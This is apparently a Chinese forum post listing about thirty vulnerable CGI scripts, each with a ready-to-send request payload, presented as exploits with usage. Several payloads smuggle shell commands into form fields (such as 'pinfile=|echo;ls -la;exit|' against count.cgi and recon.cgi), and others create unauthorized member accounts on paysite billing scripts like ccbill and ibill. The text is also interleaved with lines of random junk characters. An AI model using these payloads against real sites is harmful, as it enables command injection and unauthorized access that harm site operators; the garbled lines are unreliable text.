Cgi-bin 30个漏洞＋使用方法

admin

==============================
6 M# W4 o, s* {+ L
; [9 X1 r& V4 D% B/ Q; v+ \' ^. _: k" H/smspass.pl
username=username&password=password
* F; l$ r* b0 x) c& ]
/index.cgi
4 x2 K/ G' P2 o. f7 Wwei=ren&gen=command

/passmaster.cgi
Action=Add&Username=Username&Password=Password
7 f! [9 K$ [- l
. r/ A, U% |, @0 G/accountcreate.cgi
/ V! L( [) @- `: busername=username&password=password&ref1=|echo;ls|
; H" E( Y/ F) \. T9 n
0 P6 r  P1 M6 q; P6 C1 J/form.cgi
+ E; `& ~6 P3 ]6 i- m; aname=xxxx&email=email&subject=xxxx&response=|echo;ls|
% e1 g$ Y2 u% V: j7 K
" l$ p* v  {# J3 F/addusr.pl
/cgi-bin/EuroDebit/addusr.pl
user=username&pass=Password&confirm=Password
: {# B, m* ^4 }( B7 R( V9 N6 u+ Z6 E
/ccbill-local.asp
post_values=username:password

/count.cgi
pinfile=|echo;ls -la;exit|

/recon.cgi
/recon.cgi?search
" o5 G% J4 Y: M: D- l! G5 Q, osearchoption=1&searchfor=|echo;ls -al;exit|
$ P# h9 w* u, K1 I" u
! z/ x& h: ?  b0 X" @2 ~- Y/verotelrum.pl
9 V- i8 K$ S6 p6 P7 r* e% y  ^vercode=username:password:dseegsow:add:amount<&30>
5 t: y0 ?) a$ ]! Y# o# a! d
/af.cgi
- \1 {) L2 z" ?* N3 h% l- N_browser_out=|echo;ls -la;exit;|

2 }/ f2 }+ W8 a+ l. V1 v/modify.cgi
username=username&password=password&expire=30
' ]3 ]3 Y; q* F) E7 R5 U$ v
/openjournal.cgi
edit=1&ct=2&go=|echo;ls -al;exit|
, k5 Y5 R! x4 Y3 G+ N! }# s
0 B" j/ w' T9 d8 i: u8 K' d" e/gx9passwd.cgi
. W- N6 Z$ \: {- R* N7 I- \cmd=ADD&user=username&pass=password

/probecontrol.cgi
command=enable&username=username&password=password
6 S* @8 s0 F- ?& q+ F
/recon.cgi
: `* s/ C1 P$ Gsearchoption=3&searchfor=echo;ls -la;exit
0 W4 N; W! ]9 i( o) J8 n
. {  k1 D) u; ^# U0 D- @/htadd.pl
. [3 ^9 {; w/ ^configfile=|echo; ls -alt; exit
+ ~; Q" |/ k# C  m
/gx9passwd.cgi
cmd=ADD&user=username&pass=password
! S' p' R3 L7 ]4 f9 e
" Z& C4 o" e% x/ibill*.pl
reqtype=add&authpwd=authpwd&username=username&password=password
# s5 g5 [; H; H* ~* q6 x: y
5 H9 Y% n8 ^& f' J+ ~% C" ]5 y/ Z& X$ n/cpay.cgi
command=add_member&username=username(EMAIL)&password=password(DES)

9 B, L" Z2 l. D- R/globill_ut.cgi
0 L9 a2 C+ X$ ]6 Ldo=add&username=username&password=password&wpassword=password

/usercontrol.cgi
command=enable&username=USER&password=PASS

/globoSALErum.cgi
: g/ _9 _$ f! [! K3 @action=ADD&seccode=seccode&login=username&password=password

" Q/ M1 \. C5 D: l3 K) M' s/addusr.pl
& s) g: h- g7 Q: F& Luser=USER&pass=PASS&confirm=PASS

+ g# U/ Z2 R5 e/pincount.cgi
/cgi-bin/mastergate/pincount.cgi
pinfile=|echo;pwd;exit|
7 ?# i2 j1 O6 t0 n' U! x7 p
/accountcreate.cgi
/cgi-bin/gateway/accountcreate.cgi
username=username&password=password&password2=password&ref1=|echo;ls -al;exit
3 W# d- f) e# X2 y
/af.cgi
% ~4 r  H+ |1 C& q+ S/env.cgi
ADD+;echo;pwd;exit
9 z5 F8 U9 S% ?
* _* f. V" x6 \6 N! c/count.cgi
; o9 c( A+ K  H7 apinfile=|echo;pwd;exit|

/recon.cgi
searchoption=1&searchfor=|echo;ls%20-al;exit|

' V/ Y. _7 P/ I$ f4 g# G/add.cgi
username=username&password=password&expire=30

==============================
. B3 l( C1 a' Z! ^4 q